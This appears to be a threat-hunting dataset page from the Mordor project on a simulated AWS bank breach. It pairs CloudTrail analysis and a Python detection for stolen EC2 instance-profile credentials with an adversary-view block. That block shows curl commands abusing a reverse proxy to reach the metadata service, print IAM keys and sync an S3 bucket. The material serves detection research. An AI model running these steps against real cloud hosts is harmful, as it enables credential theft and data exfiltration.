# AWS Cloud Bank Breach S3

## Metadata

| | |
|---|---|
| Author | Roberto Rodriguez @Cyb3rWard0g |
| Creation Date | 2020/09/13 |
| Modification Date | 2020/09/13 |
| Tactics | |
| Techniques | |
| Tags | ['EC2 Proxy Abuse', 'S3 Data Exfiltration'] |
## Dataset Description

This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to reach the instance metadata service, obtain the instance profile's temporary keys and eventually exfiltrate files from an S3 bucket.
## Datasets Downloads

| Dataset Type | Link |
|---|---|
| cloud | |
## Simulation Plan

| Environment | Tool Type | Module |
|---|---|---|
| https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3 | Cloud Formation Templates | |
## Adversary View

```console
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0
> curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
{
  "Code" : "Success",
  "LastUpdated" : "2020-09-14T00:49:26Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
  "SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
  "Token" : "TOKEN",
  "Expiration" : "2020-09-14T07:10:27Z"
}
> aws configure --profile erratic
AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
Default region name [None]: us-east-1
Default output format [None]: json
> echo aws_session_token = "TOKEN" >> ~/.aws/credentials
> aws s3 ls --profile erratic
2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt
> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
2020-09-13 20:00:26         89 ring.txt
> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
```
## Explore Mordor Dataset

### Initialize Analytics Engine

```python
from openhunt.mordorutils import *
spark = get_spark()
```

### Download & Process Mordor File

```python
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/aws/collection/ec2_proxy_s3_exfiltration.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
```

```text
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
```
### Get to know your data

```python
df = spark.sql(
    '''
    SELECT *
    FROM mordorTable
    '''
)
df.show(1, vertical=True)
```

```text
-RECORD 0-----------------------------------
 @timestamp          | 2020-09-13 20:44:23
 @version            | 1
 additionalEventData | null
 apiVersion          | null
 awsRegion           | us-east-1
 eventCategory       | null
 eventID             | fd4f1042-c7f6-410...
 eventName           | DescribeInstanceT...
 eventSource         | ec2.amazonaws.com
 eventType           | AwsApiCall
 eventVersion        | 1.05
 managementEvent     | null
 readOnly            | null
 recipientAccountId  | 123456789123
 requestID           | 2db6a7b5-876c-499...
 requestParameters   | [,, [100, AAIAAUC...
 resources           | null
 responseElements    | null
 sharedEventID       | null
 sourceIPAddress     | 1.2.3.4
 userAgent           | console.ec2.amazo...
 userIdentity        | [ASIA5FLZVX4OI4ZD...
only showing top 1 row
```
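As an added example (not code from the original notebook or the Mordor project), here is the hunt this dataset is built for, written in plain Python over constructed CloudTrail-style records so it runs without Spark: flag API calls made with EC2 instance-profile credentials (an `AssumedRole` session carrying `ec2RoleDelivery` in its `sessionContext`) from a source IP that is not a known instance IP. The key ids, instance id and both IPs are assumptions made up for the example; the bucket name is the one listed in the adversary view.

```python
# Constructed CloudTrail-style records (not from the Mordor dataset). Key ids, the
# instance id and both IPs are made up. Credentials minted for an EC2 instance profile
# carry "ec2RoleDelivery" in sessionContext and use the instance id as role session name.
INSTANCE_ID = "i-0abc123def4567890"
INSTANCE_IP = "203.0.113.10"   # the proxy instance's own public IP (assumed)
ATTACKER_IP = "198.51.100.7"   # host the stolen keys were used from (assumed)
ROLE_SESSION = {
    "type": "AssumedRole",
    "accessKeyId": "ASIAEXAMPLEKEY000001",
    "arn": "arn:aws:sts::123456789123:assumed-role/BankingWAFRole/" + INSTANCE_ID,
    "sessionContext": {"ec2RoleDelivery": "2.0"},
}
SAMPLE_EVENTS = [
    # Benign: the instance itself calling EC2 from its own address.
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "sourceIPAddress": INSTANCE_IP, "userIdentity": ROLE_SESSION},
    # Suspicious: the same instance-profile keys enumerating and reading S3 elsewhere.
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "sourceIPAddress": ATTACKER_IP, "userIdentity": ROLE_SESSION},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "sourceIPAddress": ATTACKER_IP, "userIdentity": ROLE_SESSION,
     "requestParameters": {"bucketName": "mordors3stack-s3bucket-llp2yingx64a",
                           "key": "ring.txt"}},
    # An IAM user session is outside this rule's scope.
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "sourceIPAddress": ATTACKER_IP,
     "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLEKEY000002"}},
]

def is_instance_profile_session(identity):
    """True when the call used credentials delivered to an EC2 instance profile."""
    return (identity.get("type") == "AssumedRole"
            and "ec2RoleDelivery" in identity.get("sessionContext", {}))

def find_instance_credential_misuse(events, instance_ips):
    """Flag instance-profile calls from an IP outside instance_ips; calls attributed
    to an AWS service (sourceIPAddress like 'ec2.amazonaws.com') are skipped."""
    hits = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        src = ev.get("sourceIPAddress", "")
        if (not is_instance_profile_session(ident) or src in instance_ips
                or src.endswith(".amazonaws.com")):
            continue
        hits.append({"accessKeyId": ident["accessKeyId"], "sourceIPAddress": src,
                     "eventName": ev.get("eventName"),
                     "bucket": ev.get("requestParameters", {}).get("bucketName")})
    return hits
```

On the real dataset the same logic applies to the `userIdentity` and `sourceIPAddress` columns of `mordorTable`, with the instance IP list taken from an EC2 inventory rather than hard-coded.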